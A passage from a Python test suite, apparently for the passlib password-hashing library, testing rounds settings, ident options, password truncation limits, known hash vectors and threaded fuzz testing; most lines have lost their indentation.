temp = subcls.using(min_rounds=medium+adj)
self.assertEqual(temp.default_rounds, medium+adj)
# implicit default rounds -- decrease to max_rounds
temp = subcls.using(max_rounds=medium-adj)
self.assertEqual(temp.default_rounds, medium-adj)
# explicit default rounds below desired minimum
# XXX: make this a warning if min is implicit?
self.assertRaises(ValueError, subcls.using, default_rounds=small-adj)
# explicit default rounds above desired maximum
# XXX: make this a warning if max is implicit?
if orig_max_rounds:
self.assertRaises(ValueError, subcls.using, default_rounds=large+adj)
        # hash() etc should use the implicit default rounds, but honor explicit overrides
self.assertEqual(get_effective_rounds(subcls), medium)
self.assertEqual(get_effective_rounds(subcls, medium+adj), medium+adj)
# should be able to specify strings
temp = handler.using(default_rounds=str(medium))
self.assertEqual(temp.default_rounds, medium)
# invalid strings should cause error
self.assertRaises(ValueError, handler.using, default_rounds=str(medium) + "xxx")
def test_has_rounds_using_w_rounds(self):
"""
HasRounds.using() -- rounds
"""
# setup helpers
handler, subcls, small, medium, large, adj = self._create_using_rounds_helper()
orig_max_rounds = handler.max_rounds
# 'rounds' should be treated as fallback for min, max, and default
temp = subcls.using(rounds=medium+adj)
self.assertEqual(temp.min_desired_rounds, medium+adj)
self.assertEqual(temp.default_rounds, medium+adj)
self.assertEqual(temp.max_desired_rounds, medium+adj)
        # explicit min/max/default values should override the 'rounds' fallback
temp = subcls.using(rounds=medium+1, min_rounds=small+adj,
default_rounds=medium, max_rounds=large-adj)
self.assertEqual(temp.min_desired_rounds, small+adj)
self.assertEqual(temp.default_rounds, medium)
self.assertEqual(temp.max_desired_rounds, large-adj)
def test_has_rounds_using_w_vary_rounds_parsing(self):
"""
HasRounds.using() -- vary_rounds parsing
"""
# setup helpers
handler, subcls, small, medium, large, adj = self._create_using_rounds_helper()
def parse(value):
return subcls.using(vary_rounds=value).vary_rounds
# floats should be preserved
self.assertEqual(parse(0.1), 0.1)
self.assertEqual(parse('0.1'), 0.1)
# 'xx%' should be converted to float
self.assertEqual(parse('10%'), 0.1)
# ints should be preserved
self.assertEqual(parse(1000), 1000)
self.assertEqual(parse('1000'), 1000)
# float bounds should be enforced
self.assertRaises(ValueError, parse, -0.1)
self.assertRaises(ValueError, parse, 1.1)
def test_has_rounds_using_w_vary_rounds_generation(self):
"""
HasRounds.using() -- vary_rounds generation
"""
handler, subcls, small, medium, large, adj = self._create_using_rounds_helper()
def get_effective_range(cls):
seen = set(get_effective_rounds(cls) for _ in irange(1000))
return min(seen), max(seen)
def assert_rounds_range(vary_rounds, lower, upper):
temp = subcls.using(vary_rounds=vary_rounds)
seen_lower, seen_upper = get_effective_range(temp)
self.assertEqual(seen_lower, lower, "vary_rounds had wrong lower limit:")
self.assertEqual(seen_upper, upper, "vary_rounds had wrong upper limit:")
# test static
assert_rounds_range(0, medium, medium)
assert_rounds_range("0%", medium, medium)
# test absolute
assert_rounds_range(adj, medium - adj, medium + adj)
assert_rounds_range(50, max(small, medium - 50), min(large, medium + 50))
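        # (e.g. with hypothetical values medium=1000, small=500, large=1500,
        #  vary_rounds=50 should produce rounds spread across [950, 1050])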
# test relative - should shift over at 50% mark
if handler.rounds_cost == "log2":
# log rounds "50%" variance should only increase/decrease by 1 cost value
assert_rounds_range("1%", medium, medium)
assert_rounds_range("49%", medium, medium)
assert_rounds_range("50%", medium - adj, medium)
else:
            # for linear rounds, the range is frequently so huge we'll never see the endpoints,
            # so just check the observed bounds fall within an expected window.
lower, upper = get_effective_range(subcls.using(vary_rounds="50%"))
self.assertGreaterEqual(lower, max(small, medium * 0.5))
self.assertLessEqual(lower, max(small, medium * 0.8))
self.assertGreaterEqual(upper, min(large, medium * 1.2))
self.assertLessEqual(upper, min(large, medium * 1.5))
def test_has_rounds_using_and_needs_update(self):
"""
HasRounds.using() -- desired_rounds + needs_update()
"""
handler, subcls, small, medium, large, adj = self._create_using_rounds_helper()
temp = subcls.using(min_desired_rounds=small+2, max_desired_rounds=large-2)
# generate some sample hashes
small_hash = self.do_stub_encrypt(subcls, rounds=small)
medium_hash = self.do_stub_encrypt(subcls, rounds=medium)
large_hash = self.do_stub_encrypt(subcls, rounds=large)
# everything should be w/in bounds for original handler
self.assertFalse(subcls.needs_update(small_hash))
self.assertFalse(subcls.needs_update(medium_hash))
self.assertFalse(subcls.needs_update(large_hash))
# small & large should require update for temp handler
self.assertTrue(temp.needs_update(small_hash))
self.assertFalse(temp.needs_update(medium_hash))
self.assertTrue(temp.needs_update(large_hash))
#===================================================================
# idents
#===================================================================
def require_many_idents(self):
handler = self.handler
if not isinstance(handler, type) or not issubclass(handler, uh.HasManyIdents):
raise self.skipTest("handler doesn't derive from HasManyIdents")
def test_30_HasManyIdents(self):
"""validate HasManyIdents configuration"""
cls = self.handler
self.require_many_idents()
# check settings
self.assertTrue('ident' in cls.setting_kwds)
# check ident_values list
for value in cls.ident_values:
self.assertIsInstance(value, unicode,
"cls.ident_values must be unicode:")
self.assertTrue(len(cls.ident_values)>1,
"cls.ident_values must have 2+ elements:")
# check default_ident value
self.assertIsInstance(cls.default_ident, unicode,
"cls.default_ident must be unicode:")
self.assertTrue(cls.default_ident in cls.ident_values,
"cls.default_ident must specify member of cls.ident_values")
# check optional aliases list
if cls.ident_aliases:
for alias, ident in iteritems(cls.ident_aliases):
self.assertIsInstance(alias, unicode,
"cls.ident_aliases keys must be unicode:") # XXX: allow ints?
self.assertIsInstance(ident, unicode,
"cls.ident_aliases values must be unicode:")
self.assertTrue(ident in cls.ident_values,
"cls.ident_aliases must map to cls.ident_values members: %r" % (ident,))
# check constructor validates ident correctly.
handler = cls
hash = self.get_sample_hash()[1]
kwds = handler.parsehash(hash)
del kwds['ident']
# ... accepts good ident
handler(ident=cls.default_ident, **kwds)
# ... requires ident w/o defaults
self.assertRaises(TypeError, handler, **kwds)
# ... supplies default ident
handler(use_defaults=True, **kwds)
# ... rejects bad ident
self.assertRaises(ValueError, handler, ident='xXx', **kwds)
# TODO: check various supported idents
def test_has_many_idents_using(self):
"""HasManyIdents.using() -- 'default_ident' and 'ident' keywords"""
self.require_many_idents()
# pick alt ident to test with
handler = self.handler
orig_ident = handler.default_ident
for alt_ident in handler.ident_values:
if alt_ident != orig_ident:
break
else:
raise AssertionError("expected to find alternate ident: default=%r values=%r" %
(orig_ident, handler.ident_values))
def effective_ident(cls):
cls = unwrap_handler(cls)
return cls(use_defaults=True).ident
# keep default if nothing else specified
subcls = handler.using()
self.assertEqual(subcls.default_ident, orig_ident)
# accepts alt ident
subcls = handler.using(default_ident=alt_ident)
self.assertEqual(subcls.default_ident, alt_ident)
self.assertEqual(handler.default_ident, orig_ident)
# check subcls actually *generates* default ident,
# and that we didn't affect orig handler
self.assertEqual(effective_ident(subcls), alt_ident)
self.assertEqual(effective_ident(handler), orig_ident)
# rejects bad ident
self.assertRaises(ValueError, handler.using, default_ident='xXx')
# honor 'ident' alias
subcls = handler.using(ident=alt_ident)
self.assertEqual(subcls.default_ident, alt_ident)
self.assertEqual(handler.default_ident, orig_ident)
# forbid both at same time
self.assertRaises(TypeError, handler.using, default_ident=alt_ident, ident=alt_ident)
# check ident aliases are being honored
if handler.ident_aliases:
for alias, ident in handler.ident_aliases.items():
subcls = handler.using(ident=alias)
self.assertEqual(subcls.default_ident, ident, msg="alias %r:" % alias)
#===================================================================
# password size limits
#===================================================================
def test_truncate_error_setting(self):
"""
validate 'truncate_error' setting & related attributes
"""
# If it doesn't have truncate_size set,
# it shouldn't support truncate_error
hasher = self.handler
if hasher.truncate_size is None:
self.assertNotIn("truncate_error", hasher.setting_kwds)
return
# if hasher defaults to silently truncating,
# it MUST NOT use .truncate_verify_reject,
# because resulting hashes wouldn't verify!
if not hasher.truncate_error:
self.assertFalse(hasher.truncate_verify_reject)
# if hasher doesn't have configurable policy,
# it must throw error by default
if "truncate_error" not in hasher.setting_kwds:
self.assertTrue(hasher.truncate_error)
return
# test value parsing
def parse_value(value):
return hasher.using(truncate_error=value).truncate_error
self.assertEqual(parse_value(None), hasher.truncate_error)
self.assertEqual(parse_value(True), True)
self.assertEqual(parse_value("true"), True)
self.assertEqual(parse_value(False), False)
self.assertEqual(parse_value("false"), False)
self.assertRaises(ValueError, parse_value, "xxx")
def test_secret_wo_truncate_size(self):
"""
test no password size limits enforced (if truncate_size=None)
"""
# skip if hasher has a maximum password size
hasher = self.handler
if hasher.truncate_size is not None:
self.assertGreaterEqual(hasher.truncate_size, 1)
raise self.skipTest("truncate_size is set")
# NOTE: this doesn't do an exhaustive search to verify algorithm
# doesn't have some cutoff point, it just tries
# 1024-character string, and alters the last char.
# as long as algorithm doesn't clip secret at point <1024,
# the new secret shouldn't verify.
# hash a 1024-byte secret
secret = "too many secrets" * 16
alt = "x"
hash = self.do_encrypt(secret)
# check that verify doesn't silently reject secret
# (i.e. hasher mistakenly honors .truncate_verify_reject)
verify_success = not hasher.is_disabled
self.assertEqual(self.do_verify(secret, hash), verify_success,
msg="verify rejected correct secret")
# alter last byte, should get different hash, which won't verify
alt_secret = secret[:-1] + alt
self.assertFalse(self.do_verify(alt_secret, hash),
"full password not used in digest")
def test_secret_w_truncate_size(self):
"""
test password size limits raise truncate_error (if appropriate)
"""
#--------------------------------------------------
# check if test is applicable
#--------------------------------------------------
handler = self.handler
truncate_size = handler.truncate_size
if not truncate_size:
raise self.skipTest("truncate_size not set")
#--------------------------------------------------
# setup vars
#--------------------------------------------------
# try to get versions w/ and w/o truncate_error set.
        # set to None if policy isn't configurable
size_error_type = exc.PasswordSizeError
if "truncate_error" in handler.setting_kwds:
without_error = handler.using(truncate_error=False)
with_error = handler.using(truncate_error=True)
size_error_type = exc.PasswordTruncateError
elif handler.truncate_error:
without_error = None
with_error = handler
else:
# NOTE: this mode is currently an error in test_truncate_error_setting()
without_error = handler
with_error = None
# create some test secrets
base = "too many secrets"
alt = "x" # char that's not in base, used to mutate test secrets
long_secret = repeat_string(base, truncate_size+1)
short_secret = long_secret[:-1]
alt_long_secret = long_secret[:-1] + alt
alt_short_secret = short_secret[:-1] + alt
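        # (e.g. with a hypothetical truncate_size=8: long_secret="too many " (9 chars),
        #  short_secret="too many" (8 chars), and the alt_* variants swap the last char for "x")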
# init flags
short_verify_success = not handler.is_disabled
long_verify_success = short_verify_success and \
not handler.truncate_verify_reject
#--------------------------------------------------
# do tests on <truncate_size> length secret, and resulting hash.
# should pass regardless of truncate_error policy.
#--------------------------------------------------
assert without_error or with_error
for cand_hasher in [without_error, with_error]:
# create & hash string that's exactly <truncate_size> chars.
short_hash = self.do_encrypt(short_secret, handler=cand_hasher)
# check hash verifies, regardless of .truncate_verify_reject
self.assertEqual(self.do_verify(short_secret, short_hash,
handler=cand_hasher),
short_verify_success)
# changing <truncate_size-1>'th char should invalidate hash
# if this fails, means (reported) truncate_size is too large.
self.assertFalse(self.do_verify(alt_short_secret, short_hash,
handler=with_error),
"truncate_size value is too large")
# verify should truncate long secret before comparing
# (unless truncate_verify_reject is set)
self.assertEqual(self.do_verify(long_secret, short_hash,
handler=cand_hasher),
long_verify_success)
#--------------------------------------------------
# do tests on <truncate_size+1> length secret,
# w/ truncate error disabled (should silently truncate)
#--------------------------------------------------
if without_error:
# create & hash string that's exactly truncate_size+1 chars
long_hash = self.do_encrypt(long_secret, handler=without_error)
# check verifies against secret (unless truncate_verify_reject=True)
self.assertEqual(self.do_verify(long_secret, long_hash,
handler=without_error),
short_verify_success)
# check mutating last char doesn't change outcome.
# if this fails, means (reported) truncate_size is too small.
self.assertEqual(self.do_verify(alt_long_secret, long_hash,
handler=without_error),
short_verify_success)
# check short_secret verifies against this hash
# if this fails, means (reported) truncate_size is too large.
self.assertTrue(self.do_verify(short_secret, long_hash,
handler=without_error))
#--------------------------------------------------
# do tests on <truncate_size+1> length secret,
# w/ truncate error
#--------------------------------------------------
if with_error:
# with errors enabled, should forbid truncation.
err = self.assertRaises(size_error_type, self.do_encrypt,
long_secret, handler=with_error)
self.assertEqual(err.max_size, truncate_size)
#===================================================================
# password contents
#===================================================================
def test_61_secret_case_sensitive(self):
"""test password case sensitivity"""
hash_insensitive = self.secret_case_insensitive is True
verify_insensitive = self.secret_case_insensitive in [True,
"verify-only"]
# test hashing lower-case verifies against lower & upper
lower = 'test'
upper = 'TEST'
h1 = self.do_encrypt(lower)
if verify_insensitive and not self.handler.is_disabled:
self.assertTrue(self.do_verify(upper, h1),
"verify() should not be case sensitive")
else:
self.assertFalse(self.do_verify(upper, h1),
"verify() should be case sensitive")
# test hashing upper-case verifies against lower & upper
h2 = self.do_encrypt(upper)
if verify_insensitive and not self.handler.is_disabled:
self.assertTrue(self.do_verify(lower, h2),
"verify() should not be case sensitive")
else:
self.assertFalse(self.do_verify(lower, h2),
"verify() should be case sensitive")
# test genhash
# XXX: 2.0: what about 'verify-only' hashes once genhash() is removed?
# won't have easy way to recreate w/ same config to see if hash differs.
# (though only hash this applies to is mssql2000)
h2 = self.do_genhash(upper, h1)
if hash_insensitive or (self.handler.is_disabled and not self.disabled_contains_salt):
self.assertEqual(h2, h1,
"genhash() should not be case sensitive")
else:
self.assertNotEqual(h2, h1,
"genhash() should be case sensitive")
def test_62_secret_border(self):
"""test non-string passwords are rejected"""
hash = self.get_sample_hash()[1]
# secret=None
self.assertRaises(TypeError, self.do_encrypt, None)
self.assertRaises(TypeError, self.do_genhash, None, hash)
self.assertRaises(TypeError, self.do_verify, None, hash)
# secret=int (picked as example of entirely wrong class)
self.assertRaises(TypeError, self.do_encrypt, 1)
self.assertRaises(TypeError, self.do_genhash, 1, hash)
self.assertRaises(TypeError, self.do_verify, 1, hash)
# xxx: move to password size limits section, above?
def test_63_large_secret(self):
"""test MAX_PASSWORD_SIZE is enforced"""
from passlib.exc import PasswordSizeError
from passlib.utils import MAX_PASSWORD_SIZE
secret = '.' * (1+MAX_PASSWORD_SIZE)
hash = self.get_sample_hash()[1]
err = self.assertRaises(PasswordSizeError, self.do_genhash, secret, hash)
self.assertEqual(err.max_size, MAX_PASSWORD_SIZE)
self.assertRaises(PasswordSizeError, self.do_encrypt, secret)
self.assertRaises(PasswordSizeError, self.do_verify, secret, hash)
def test_64_forbidden_chars(self):
"""test forbidden characters not allowed in password"""
chars = self.forbidden_characters
if not chars:
raise self.skipTest("none listed")
base = u('stub')
if isinstance(chars, bytes):
from passlib.utils.compat import iter_byte_chars
chars = iter_byte_chars(chars)
base = base.encode("ascii")
for c in chars:
self.assertRaises(ValueError, self.do_encrypt, base + c + base)
#===================================================================
# check identify(), verify(), genhash() against test vectors
#===================================================================
def is_secret_8bit(self, secret):
secret = self.populate_context(secret, {})
return not is_ascii_safe(secret)
def expect_os_crypt_failure(self, secret):
"""
check if we're expecting potential verify failure due to crypt.crypt() encoding limitation
"""
if PY3 and self.backend == "os_crypt" and isinstance(secret, bytes):
try:
secret.decode("utf-8")
except UnicodeDecodeError:
return True
return False
def test_70_hashes(self):
"""test known hashes"""
# sanity check
self.assertTrue(self.known_correct_hashes or self.known_correct_configs,
"test must set at least one of 'known_correct_hashes' "
"or 'known_correct_configs'")
# run through known secret/hash pairs
saw8bit = False
for secret, hash in self.iter_known_hashes():
if self.is_secret_8bit(secret):
saw8bit = True
# hash should be positively identified by handler
self.assertTrue(self.do_identify(hash),
"identify() failed to identify hash: %r" % (hash,))
# check if what we're about to do is expected to fail due to crypt.crypt() limitation.
expect_os_crypt_failure = self.expect_os_crypt_failure(secret)
try:
# secret should verify successfully against hash
self.check_verify(secret, hash, "verify() of known hash failed: "
"secret=%r, hash=%r" % (secret, hash))
# genhash() should reproduce same hash
result = self.do_genhash(secret, hash)
self.assertIsInstance(result, str,
"genhash() failed to return native string: %r" % (result,))
if self.handler.is_disabled and self.disabled_contains_salt:
continue
self.assertEqual(result, hash, "genhash() failed to reproduce "
"known hash: secret=%r, hash=%r: result=%r" %
(secret, hash, result))
except MissingBackendError:
if not expect_os_crypt_failure:
raise
# would really like all handlers to have at least one 8-bit test vector
if not saw8bit:
warn("%s: no 8-bit secrets tested" % self.__class__)
def test_71_alternates(self):
"""test known alternate hashes"""
if not self.known_alternate_hashes:
raise self.skipTest("no alternate hashes provided")
for alt, secret, hash in self.known_alternate_hashes:
# hash should be positively identified by handler
self.assertTrue(self.do_identify(hash),
"identify() failed to identify alternate hash: %r" %
(hash,))
# secret should verify successfully against hash
self.check_verify(secret, alt, "verify() of known alternate hash "
"failed: secret=%r, hash=%r" % (secret, alt))
# genhash() should reproduce canonical hash
result = self.do_genhash(secret, alt)
self.assertIsInstance(result, str,
"genhash() failed to return native string: %r" % (result,))
if self.handler.is_disabled and self.disabled_contains_salt:
continue
self.assertEqual(result, hash, "genhash() failed to normalize "
"known alternate hash: secret=%r, alt=%r, hash=%r: "
"result=%r" % (secret, alt, hash, result))
def test_72_configs(self):
"""test known config strings"""
# special-case handlers without settings
if not self.handler.setting_kwds:
self.assertFalse(self.known_correct_configs,
"handler should not have config strings")
raise self.skipTest("hash has no settings")
if not self.known_correct_configs:
# XXX: make this a requirement?
raise self.skipTest("no config strings provided")
# make sure config strings work (hashes in list tested in test_70)
if self.filter_config_warnings:
warnings.filterwarnings("ignore", category=PasslibHashWarning)
for config, secret, hash in self.known_correct_configs:
# config should be positively identified by handler
self.assertTrue(self.do_identify(config),
"identify() failed to identify known config string: %r" %
(config,))
# verify() should throw error for config strings.
self.assertRaises(ValueError, self.do_verify, secret, config,
__msg__="verify() failed to reject config string: %r" %
(config,))
# genhash() should reproduce hash from config.
result = self.do_genhash(secret, config)
self.assertIsInstance(result, str,
"genhash() failed to return native string: %r" % (result,))
self.assertEqual(result, hash, "genhash() failed to reproduce "
"known hash from config: secret=%r, config=%r, hash=%r: "
"result=%r" % (secret, config, hash, result))
def test_73_unidentified(self):
"""test known unidentifiably-mangled strings"""
if not self.known_unidentified_hashes:
raise self.skipTest("no unidentified hashes provided")
for hash in self.known_unidentified_hashes:
# identify() should reject these
self.assertFalse(self.do_identify(hash),
"identify() incorrectly identified known unidentifiable "
"hash: %r" % (hash,))
# verify() should throw error
self.assertRaises(ValueError, self.do_verify, 'stub', hash,
__msg__= "verify() failed to throw error for unidentifiable "
"hash: %r" % (hash,))
# genhash() should throw error
self.assertRaises(ValueError, self.do_genhash, 'stub', hash,
__msg__= "genhash() failed to throw error for unidentifiable "
"hash: %r" % (hash,))
def test_74_malformed(self):
"""test known identifiable-but-malformed strings"""
if not self.known_malformed_hashes:
raise self.skipTest("no malformed hashes provided")
for hash in self.known_malformed_hashes:
# identify() should accept these
self.assertTrue(self.do_identify(hash),
"identify() failed to identify known malformed "
"hash: %r" % (hash,))
# verify() should throw error
self.assertRaises(ValueError, self.do_verify, 'stub', hash,
__msg__= "verify() failed to throw error for malformed "
"hash: %r" % (hash,))
# genhash() should throw error
self.assertRaises(ValueError, self.do_genhash, 'stub', hash,
__msg__= "genhash() failed to throw error for malformed "
"hash: %r" % (hash,))
def test_75_foreign(self):
"""test known foreign hashes"""
if self.accepts_all_hashes:
raise self.skipTest("not applicable")
if not self.known_other_hashes:
raise self.skipTest("no foreign hashes provided")
for name, hash in self.known_other_hashes:
# NOTE: most tests use default list of foreign hashes,
# so they may include ones belonging to that hash...
# hence the 'own' logic.
if name == self.handler.name:
# identify should accept these
self.assertTrue(self.do_identify(hash),
"identify() failed to identify known hash: %r" % (hash,))
# verify & genhash should NOT throw error
self.do_verify('stub', hash)
result = self.do_genhash('stub', hash)
self.assertIsInstance(result, str,
"genhash() failed to return native string: %r" % (result,))
else:
# identify should reject these
self.assertFalse(self.do_identify(hash),
"identify() incorrectly identified hash belonging to "
"%s: %r" % (name, hash))
# verify should throw error
self.assertRaises(ValueError, self.do_verify, 'stub', hash,
__msg__= "verify() failed to throw error for hash "
"belonging to %s: %r" % (name, hash,))
# genhash() should throw error
self.assertRaises(ValueError, self.do_genhash, 'stub', hash,
__msg__= "genhash() failed to throw error for hash "
"belonging to %s: %r" % (name, hash))
def test_76_hash_border(self):
"""test non-string hashes are rejected"""
#
# test hash=None is handled correctly
#
self.assertRaises(TypeError, self.do_identify, None)
self.assertRaises(TypeError, self.do_verify, 'stub', None)
# NOTE: changed in 1.7 -- previously 'None' would be accepted when config strings not supported.
self.assertRaises(TypeError, self.do_genhash, 'stub', None)
#
# test hash=int is rejected (picked as example of entirely wrong type)
#
self.assertRaises(TypeError, self.do_identify, 1)
self.assertRaises(TypeError, self.do_verify, 'stub', 1)
self.assertRaises(TypeError, self.do_genhash, 'stub', 1)
#
# test hash='' is rejected for all but the plaintext hashes
#
for hash in [u(''), b'']:
if self.accepts_all_hashes:
# then it accepts empty string as well.
self.assertTrue(self.do_identify(hash))
self.do_verify('stub', hash)
result = self.do_genhash('stub', hash)
self.check_returned_native_str(result, "genhash")
else:
# otherwise it should reject them
self.assertFalse(self.do_identify(hash),
"identify() incorrectly identified empty hash")
self.assertRaises(ValueError, self.do_verify, 'stub', hash,
__msg__="verify() failed to reject empty hash")
self.assertRaises(ValueError, self.do_genhash, 'stub', hash,
__msg__="genhash() failed to reject empty hash")
#
# test identify doesn't throw decoding errors on 8-bit input
#
self.do_identify('\xe2\x82\xac\xc2\xa5$') # utf-8
self.do_identify('abc\x91\x00') # non-utf8
#===================================================================
# fuzz testing
#===================================================================
def test_77_fuzz_input(self, threaded=False):
"""fuzz testing -- random passwords and options
This test attempts to perform some basic fuzz testing of the hash,
based on whatever information can be found about it.
It does as much as it can within a fixed amount of time
(defaults to 1 second, but can be overridden via $PASSLIB_TEST_FUZZ_TIME).
It tests the following:
* randomly generated passwords including extended unicode chars
* randomly selected rounds values (if rounds supported)
* randomly selected salt sizes (if salts supported)
* randomly selected identifiers (if multiple found)
* runs output of selected backend against other available backends
(if any) to detect errors occurring between different backends.
* runs output against other "external" verifiers such as OS crypt()
        :param threaded:
            set to True when run from test_78_fuzz_threading(); uses a per-thread RNG
            name, and skips the backend-switching verifiers (which aren't thread-safe yet).
"""
if self.handler.is_disabled:
raise self.skipTest("not applicable")
# gather info
from passlib.utils import tick
max_time = self.max_fuzz_time
if max_time <= 0:
raise self.skipTest("disabled by test mode")
verifiers = self.get_fuzz_verifiers(threaded=threaded)
def vname(v):
return (v.__doc__ or v.__name__).splitlines()[0]
# init rng -- using separate one for each thread
# so things are predictable for given RANDOM_TEST_SEED
# (relies on test_78_fuzz_threading() to give threads unique names)
if threaded:
thread_name = threading.current_thread().name
else:
thread_name = "fuzz test"
rng = self.getRandom(name=thread_name)
generator = self.FuzzHashGenerator(self, rng)
# do as many tests as possible for max_time seconds
log.debug("%s: %s: started; max_time=%r verifiers=%d (%s)",
self.descriptionPrefix, thread_name, max_time, len(verifiers),
", ".join(vname(v) for v in verifiers))
start = tick()
stop = start + max_time
count = 0
while tick() <= stop:
# generate random password & options
opts = generator.generate()
secret = opts['secret']
other = opts['other']
settings = opts['settings']
ctx = opts['context']
if ctx:
settings['context'] = ctx
# create new hash
hash = self.do_encrypt(secret, **settings)
##log.debug("fuzz test: hash=%r secret=%r other=%r",
## hash, secret, other)
# run through all verifiers we found.
for verify in verifiers:
name = vname(verify)
result = verify(secret, hash, **ctx)
if result == "skip": # let verifiers signal lack of support
continue
assert result is True or result is False
if not result:
raise self.failureException("failed to verify against %r verifier: "
"secret=%r config=%r hash=%r" %
(name, secret, settings, hash))
# occasionally check that some other secrets WON'T verify
# against this hash.
if rng.random() < .1:
result = verify(other, hash, **ctx)
if result and result != "skip":
raise self.failureException("was able to verify wrong "
"password using %s: wrong_secret=%r real_secret=%r "
"config=%r hash=%r" % (name, other, secret, settings, hash))
count += 1
log.debug("%s: %s: done; elapsed=%r count=%r",
self.descriptionPrefix, thread_name, tick() - start, count)
def test_78_fuzz_threading(self):
"""multithreaded fuzz testing -- random password & options using multiple threads
run test_77 simultaneously in multiple threads
in an attempt to detect any concurrency issues
(e.g. the bug fixed by pybcrypt 0.3)
"""
self.require_TEST_MODE("full")
import threading
# check if this test should run
if self.handler.is_disabled:
raise self.skipTest("not applicable")
thread_count = self.fuzz_thread_count
if thread_count < 1 or self.max_fuzz_time <= 0:
raise self.skipTest("disabled by test mode")
# buffer to hold errors thrown by threads
failed_lock = threading.Lock()
failed = [0]
# launch <thread count> threads, all of which run
# test_77_fuzz_input(), and see if any errors get thrown.
# if hash has concurrency issues, this should reveal it.
def wrapper():
try:
self.test_77_fuzz_input(threaded=True)
except SkipTest:
pass
except:
with failed_lock:
failed[0] += 1
raise
def launch(n):
name = "Fuzz-Thread-%d" % (n,)
thread = threading.Thread(target=wrapper, name=name)
thread.setDaemon(True)
thread.start()
return thread
threads = [launch(n) for n in irange(thread_count)]
# wait until all threads exit
timeout = self.max_fuzz_time * thread_count * 4
stalled = 0
for thread in threads:
thread.join(timeout)
if not thread.is_alive():
continue
# XXX: not sure why this is happening, main one seems 1/4 times for sun_md5_crypt
log.error("%s timed out after %f seconds", thread.name, timeout)
stalled += 1
# if any thread threw an error, raise one ourselves.
if failed[0]:
raise self.fail("%d/%d threads failed concurrent fuzz testing "
"(see error log for details)" % (failed[0], thread_count))
if stalled:
raise self.fail("%d/%d threads stalled during concurrent fuzz testing "
"(see error log for details)" % (stalled, thread_count))
#---------------------------------------------------------------
# fuzz constants & helpers
#---------------------------------------------------------------
@property
def max_fuzz_time(self):
"""amount of time to spend on fuzz testing"""
value = float(os.environ.get("PASSLIB_TEST_FUZZ_TIME") or 0)
if value:
return value
elif TEST_MODE(max="quick"):
return 0
elif TEST_MODE(max="default"):
return 1
else:
return 5
@property
def fuzz_thread_count(self):
"""number of threads for threaded fuzz testing"""
value = int(os.environ.get("PASSLIB_TEST_FUZZ_THREADS") or 0)
if value:
return value
elif TEST_MODE(max="quick"):
return 0
else:
return 10
#---------------------------------------------------------------
# fuzz verifiers
#---------------------------------------------------------------
#: list of custom fuzz-test verifiers (in addition to hasher itself,
#: and backend-specific wrappers of hasher). each element is
#: name of method that will return None / a verifier callable.
fuzz_verifiers = ("fuzz_verifier_default",)
def get_fuzz_verifiers(self, threaded=False):
"""return list of password verifiers (including external libs)
used by fuzz testing.
verifiers should be callable with signature
``func(password: unicode, hash: ascii str) -> ok: bool``.
"""
handler = self.handler
verifiers = []
        # call each method named in fuzz_verifiers to build the list of verifier callables
for method_name in self.fuzz_verifiers:
func = getattr(self, method_name)()
if func is not None:
verifiers.append(func)
# create verifiers for any other available backends
# NOTE: skipping this under threading test,
# since backend switching isn't threadsafe (yet)
if hasattr(handler, "backends") and TEST_MODE("full") and not threaded:
def maker(backend):
def func(secret, hash):
orig_backend = handler.get_backend()
try:
handler.set_backend(backend)
return handler.verify(secret, hash)
finally:
handler.set_backend(orig_backend)
func.__name__ = "check_" + backend + "_backend"
func.__doc__ = backend + "-backend"
return func
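            # (maker() is needed so each generated verifier closes over its own
            #  'backend' value rather than the shared loop variable)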
for backend in iter_alt_backends(handler):
verifiers.append(maker(backend))
return verifiers
def fuzz_verifier_default(self):
# test against self
def check_default(secret, hash, **ctx):
return self.do_verify(secret, hash, **ctx)
if self.backend:
check_default.__doc__ = self.backend + "-backend"
else:
check_default.__doc__ = "self"
return check_default
#---------------------------------------------------------------
# fuzz settings generation
#---------------------------------------------------------------
class FuzzHashGenerator(object):
"""
helper which takes care of generating random
passwords & configuration options to test hash with.
separate from test class so we can create one per thread.
"""
#==========================================================
# class attrs
#==========================================================
# alphabet for randomly generated passwords
password_alphabet = u('qwertyASDF1234<>.@*#! \u00E1\u0259\u0411\u2113')
# encoding when testing bytes
password_encoding = "utf-8"
# map of setting kwd -> method name.
# will ignore setting if method returns None.
# subclasses should make copy of dict.
settings_map = dict(rounds="random_rounds",
salt_size="random_salt_size",
ident="random_ident")
# map of context kwd -> method name.
context_map = {}
#==========================================================
# init / generation
#==========================================================
def __init__(self, test, rng):
self.test = test
self.handler = test.handler
self.rng = rng
def generate(self):
"""
generate random password and options for fuzz testing.
            :returns:
                dict with keys ``secret``, ``other``, ``settings``, and ``context``
"""
def gendict(map):
out = {}
for key, meth in map.items():
                    value = getattr(self, meth)()
if value is not None:
out[key] = value
return out
secret, other = self.random_password_pair()
return dict(secret=secret,
other=other,
settings=gendict(self.settings_map),
context=gendict(self.context_map),
)
#==========================================================
# helpers
#==========================================================
def randintgauss(self, lower, upper, mu, sigma):
"""generate random int w/ gauss distirbution"""
value = self.rng.normalvariate(mu, sigma)
return int(limit(value, lower, upper))
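            # (e.g. randintgauss(1, 50, 15, 15) draws from a normal distribution centered
            #  on 15 with sigma=15, then clamps the result into [1, 50])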
#==========================================================
# settings generation
#==========================================================
def random_rounds(self):
handler = self.handler
if not has_rounds_info(handler):
return None
default = handler.default_rounds or handler.min_rounds
lower = handler.min_rounds
if handler.rounds_cost == "log2":
upper = default
else:
upper = min(default*2, handler.max_rounds)
return self.randintgauss(lower, upper, default, default*.5)
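            # (e.g. for a hypothetical log2-cost handler with min_rounds=4 and
            #  default_rounds=12, this draws from N(12, 6) clamped into [4, 12])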
def random_salt_size(self):
handler = self.handler
if not (has_salt_info(handler) and 'salt_size' in handler.setting_kwds):
return None
default = handler.default_salt_size
lower = handler.min_salt_size
upper = handler.max_salt_size or default*4
return self.randintgauss(lower, upper, default, default*.5)
def random_ident(self):
rng = self.rng
handler = self.handler
if 'ident' not in handler.setting_kwds or not hasattr(handler, "ident_values"):
return None
if rng.random() < .5:
return None
# resolve wrappers before reading values
handler = getattr(handler, "wrapped", handler)
return rng.choice(handler.ident_values)
#==========================================================
# fuzz password generation
#==========================================================
def random_password_pair(self):
"""generate random password, and non-matching alternate password"""
secret = self.random_password()
while True:
other = self.random_password()
if self.accept_password_pair(secret, other):
break
rng = self.rng
if rng.randint(0,1):
secret = secret.encode(self.password_encoding)
if rng.randint(0,1):
other = other.encode(self.password_encoding)
return secret, other
def random_password(self):
"""generate random passwords for fuzz testing"""
# occasionally try an empty password
rng = self.rng
